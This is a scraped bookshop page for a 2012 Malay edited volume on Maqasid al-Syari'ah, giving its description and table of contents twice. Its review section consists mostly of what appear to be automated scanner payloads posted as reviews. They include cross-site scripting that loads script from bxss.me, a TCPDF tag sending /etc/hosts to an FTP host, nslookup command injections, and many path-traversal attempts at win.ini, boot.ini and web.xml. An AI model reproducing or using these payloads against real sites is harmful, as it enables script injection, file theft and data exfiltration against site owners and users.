You currently have
in your basket.

Maqasid Al-Syari'ah

Editor: Mahmood Zuhdi Abdul Majid, Mek Wok Mahmud & Akhtarzaite Abdul Aziz
$19.20

ISBN 978-967-418-235-9

First edition, 2012

Malay book

290 pages

Buku ini mengenai Maqasid Al-Syari'ah, iaitu objektif hukum Islam. Ia merangkumi huraian tentang objektif umum, iaitu tujuan Syariat Islam itu sendiri diturunkan dan beberapa contok objektif khusus bagi perkara atau masalah tertentu. Kefahaman tentang objektif umum Syari'ah dan objektif khusus bagi sesuatu hukum itu penting dalam menentukan jenis hukum yang perlu ditentukan bagi kes atau persoalan yang dihadapi oleh seseorang penyelidik tentang hukum.

Ia secara umumnya berdasarkan kertas kerja yang pernah dibentangkan di seminar tentang Maqasid al-Syariah anjuran Jabatan Fiqh dan Usul Fiqh, Universiti Islam Antarabangsa Malaysia.

KANDUNGAN

- Maqasid Al-Syari'ah: Satu Pengenalan (Mahmood Zuhdi Haji Abdul Majid) m.s. 1.

- Maqasid Al-Syari'ah sebagai asas pendekatan siyasah syar'iyyah dalam pentadbiran negara (Noor Naemah bt. Abdul Rahman & Muhammad Nazir bin Alias) m.s. 51.

- Pendekatan baru maqasid al-syari'ah dalam pengajian syari'ah di Malaysia: satu analisis (Paizah Ismail, Rahimin Affandi Abdul Rahim & Idris Awang) m.s. 67.

- Maqsad Hifz Al-Mal, Prinsip Al-Islah dan Al-Rukhsah dan aplikasi dalam pembentukan dan operasi tolok ukur Shari'ah Pelaburan ekuiti di Malaysia. (Mohamad Nabil Mohamad Shukri). m.s. 113.

- Kepentingan Dawabit Al-Maslahah dalam konteks Maqasid Al-Shari'ah: Kesinambungan antara pemikiran Al-Buti dan Al-Shatibi (Ismail Ibrahim, Muhammad Adib Samsudin, Muhammad Nazir Alias). m.s. 139

- Produk Hibah dan kesannya kepada pencapaian Maqasid Al-Shari'ah dalam sistem kekeluargaan Islam di Malaysia (Abdul Karim Ali, Raihanah Haji Azahari, Ridzwan bin Ahmad, Muhamad Safiri Ismail, Ameer Azeezy Tuan Abdullah). m.s. 157.

- Aplikasi Maslahah dalam menyelesaikan kes pengecualian sistem pusaka Islam (Noor Lizza Mohamed Said). m.s. 175.

- Menangani Ikhtilaf di Malaysia menerusi penghayatan Fiqh Al-Maqasid (Saadan Man). m.s. 223.

- Maqasid Al-Shariah dalam perlaksanaan waqaf (Mohamad Akram Laldin, Mek Wok Mahmud, Mohd. Fuad Sawari) m.s. 259.

ISBN 978-967-418-235-9

First edition, 2012

Malay book

290 pages

Buku ini mengenai Maqasid Al-Syari'ah, iaitu objektif hukum Islam. Ia merangkumi huraian tentang objektif umum, iaitu tujuan Syariat Islam itu sendiri diturunkan dan beberapa contok objektif khusus bagi perkara atau masalah tertentu. Kefahaman tentang objektif umum Syari'ah dan objektif khusus bagi sesuatu hukum itu penting dalam menentukan jenis hukum yang perlu ditentukan bagi kes atau persoalan yang dihadapi oleh seseorang penyelidik tentang hukum.

Ia secara umumnya berdasarkan kertas kerja yang pernah dibentangkan di seminar tentang Maqasid al-Syariah anjuran Jabatan Fiqh dan Usul Fiqh, Universiti Islam Antarabangsa Malaysia.

KANDUNGAN

- Maqasid Al-Syari'ah: Satu Pengenalan (Mahmood Zuhdi Haji Abdul Majid) m.s. 1.

- Maqasid Al-Syari'ah sebagai asas pendekatan siyasah syar'iyyah dalam pentadbiran negara (Noor Naemah bt. Abdul Rahman & Muhammad Nazir bin Alias) m.s. 51.

- Pendekatan baru maqasid al-syari'ah dalam pengajian syari'ah di Malaysia: satu analisis (Paizah Ismail, Rahimin Affandi Abdul Rahim & Idris Awang) m.s. 67.

- Maqsad Hifz Al-Mal, Prinsip Al-Islah dan Al-Rukhsah dan aplikasi dalam pembentukan dan operasi tolok ukur Shari'ah Pelaburan ekuiti di Malaysia. (Mohamad Nabil Mohamad Shukri). m.s. 113.

- Kepentingan Dawabit Al-Maslahah dalam konteks Maqasid Al-Shari'ah: Kesinambungan antara pemikiran Al-Buti dan Al-Shatibi (Ismail Ibrahim, Muhammad Adib Samsudin, Muhammad Nazir Alias). m.s. 139

- Produk Hibah dan kesannya kepada pencapaian Maqasid Al-Shari'ah dalam sistem kekeluargaan Islam di Malaysia (Abdul Karim Ali, Raihanah Haji Azahari, Ridzwan bin Ahmad, Muhamad Safiri Ismail, Ameer Azeezy Tuan Abdullah). m.s. 157.

- Aplikasi Maslahah dalam menyelesaikan kes pengecualian sistem pusaka Islam (Noor Lizza Mohamed Said). m.s. 175.

- Menangani Ikhtilaf di Malaysia menerusi penghayatan Fiqh Al-Maqasid (Saadan Man). m.s. 223.

- Maqasid Al-Shariah dalam perlaksanaan waqaf (Mohamad Akram Laldin, Mek Wok Mahmud, Mohd. Fuad Sawari) m.s. 259.

Write your own review
  • Only registered users can write reviews
  • Bad
  • Excellent
Existing reviews
Mr.
1
From: yebglfyh | Date: 4/15/2016 8:07 PM
Was this review helpful? Yes No (0/0)
Mr.
1
From: yebglfyh | Date: 4/15/2016 8:07 PM
Was this review helpful? Yes No (0/0)
Mr.
1
From: yebglfyh | Date: 4/15/2016 8:07 PM
Was this review helpful? Yes No (0/0)
Mr.
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=007220&r=18-15935&h=18-ee77f-2&/).slice(2),document.documentElement.appendChild(s))//'>
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
1'>"><script src=http://bxss.me/s?u=007220&r=18-15936&h=18-ee77f-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,007220,18-15936,18,ee77f,%22%5D"/>
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=007220&r=18-15937&h=18-ee77f-2&/).slice(2),document.documentElement.appendChild(s))//'>
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
1'>"><script src=http://bxss.me/s?u=007220&r=18-15938&h=18-ee77f-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,007220,18-15938,18,ee77f,%22%5D"/>
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=007220&r=18-15939&h=18-ee77f-2&/).slice(2),document.documentElement.appendChild(s))//'>
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
1'>"><script src=http://bxss.me/s?u=007220&r=18-15940&h=18-ee77f-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,007220,18-15940,18,ee77f,%22%5D"/>
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
set|set&set
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
$(nslookup dns.ce.\007220.18-15949.18.ee77f.\1.bxss.me)
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
&nslookup dns.ce.\007220.18-15950.18.ee77f.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-15950.18.ee77f.\1.bxss.me&`'
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
set|set&set
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
$(nslookup dns.ce.\007220.18-15951.18.ee77f.\1.bxss.me)
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
&nslookup dns.ce.\007220.18-15952.18.ee77f.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-15952.18.ee77f.\1.bxss.me&`'
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
set|set&set
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
$(nslookup dns.ce.\007220.18-15953.18.ee77f.\1.bxss.me)
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
&nslookup dns.ce.\007220.18-15954.18.ee77f.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-15954.18.ee77f.\1.bxss.me&`'
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
set|set&set
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
$(nslookup dns.ce.\007220.18-15955.18.ee77f.\1.bxss.me)
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
&nslookup dns.ce.\007220.18-15956.18.ee77f.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-15956.18.ee77f.\1.bxss.me&`'
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
set|set&set
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
$(nslookup dns.ce.\007220.18-15957.18.ee77f.\1.bxss.me)
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../boot.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
&nslookup dns.ce.\007220.18-15958.18.ee77f.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-15958.18.ee77f.\1.bxss.me&`'
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
set|set&set
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini.jpg
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
$(nslookup dns.ce.\007220.18-15959.18.ee77f.\1.bxss.me)
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
������������������������������������������������windows��win.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
&nslookup dns.ce.\007220.18-15960.18.ee77f.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-15960.18.ee77f.\1.bxss.me&`'
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
................windowswin.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
..\..\..\..\..\..\..\..\windows\win.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
12345'"\'\");|]*{
<>�''💩
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
1some_inexistent_file_with_long_name.jpg
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF/web.xml
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
Http://testasp.vulnweb.com/t/fit.txt
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF\web.xml
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/fit.txt?.jpg
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
testasp.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
1some_inexistent_file_with_long_name.jpg
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../boot.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
Http://testasp.vulnweb.com/t/fit.txt
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
12345'"\'\");|]*{
<>�''💩
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/fit.txt?.jpg
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini.jpg
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
testasp.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
������������������������������������������������windows��win.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
1some_inexistent_file_with_long_name.jpg
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
................windowswin.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
Http://testasp.vulnweb.com/t/fit.txt
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
..\..\..\..\..\..\..\..\windows\win.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/fit.txt?.jpg
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
testasp.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
12345'"\'\");|]*{
<>�''💩
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
1some_inexistent_file_with_long_name.
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Http://testasp.vulnweb.com/t/fit.txt
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
http://testasp.vulnweb.com/t/fit.txt?.
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
testasp.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:14 PM
Was this review helpful? Yes No (0/0)
Mr.
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.